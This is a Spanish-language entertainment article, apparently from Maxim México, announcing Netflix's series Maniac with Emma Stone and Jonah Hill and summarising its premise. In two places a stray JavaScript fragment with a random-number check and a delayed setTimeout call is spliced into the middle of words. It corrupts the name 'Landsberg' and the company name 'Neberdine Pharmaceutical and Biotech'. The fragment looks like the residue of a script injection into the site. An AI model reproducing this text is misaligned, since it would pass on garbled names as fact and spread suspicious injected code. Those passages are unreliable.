Emma Stone y Jonah Hill protagonizan Maniac, la nueva serie de Netflix | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Emma Stone y Jonah Hill protagonizan Maniac, la nueva serie de Netflix

    Dirigida por Cary Joji Fukunaga, Maniac nos muestra a la mente humana como un acertijo que debe manejarse con mucho cuidado.

    Autor: Redacción Maxim 6 agosto, 2018


     

    Cortesía de Netflix.

     

    Maniac llegará al gigante de streaming el próximo 21 de septiembre

     

    Maniac  es una serie creada por Patrick Somerville, que a su vez está dirigida por Cary Joji Fukunaga (True Detective, Beasts of No Nation) y protagonizada por Emma Stone,  Jonah Hill, Sally Field y Justin Theroux.

     

     

    via GIPHY

     

     

     

    ¿De qué va?

     

    Maniac se desarrolla en una época muy similar a la que estamos viviendo. Cuenta la historia de Annie Landom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andsberg (Stone) y Owen Milgrim (Hill), ambos se han sometido a una especie de estudio farmacéutico piloto con el fin de aliviar sus afeccciones.

     

     

    Emma Stone. Fotografía por Michele K. Short / Netflix.

     

     

    Annie, el personaje que interpreta Stone, es una chica obsesionada con reparar las relaciones con su madre y hermana; por su parte Owen (Hill),  es el quinto hijo de  una pareja de poderosos industrialistas neoyorquinos, quien ha luchado toda su vida con su diagnóstico de esquizofrenia.

     

     

     

    Jonah Hill. Fotografía por Michele K. Short / Netflix.

     

    Este par de almas cree en promesa de que un radical tratamiento farmacéutico, los liberará de sus problemas. Esto consiste en una serie de pastillas que inventó el Dr. James K. Mantleray (Justin Theroux), y que se supone tienen la capacidad de curar cualquier desequilibrio mental, ya sea por tristeza o una enfermedad.

     

     

     

    Fotografía por Michele K. Short / Netflix.

     

     

    Las pruebas médicas las realizan a un grupo de personas en el centro Neberdine Pharmaceutical andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Biotech, sin embargo, nada saldrá según los planes y veremos una serie de sucesos en los que tendremos que identificar que es y que no es real.

     

     

     

     

    ¡Ya queremos verla!

     

     

     

    Temas relacionados con esta nota: , , , , ,

Dirigida por Cary Joji Fukunaga, Maniac nos muestra a la mente humana como un acertijo que debe manejarse con mucho cuidado.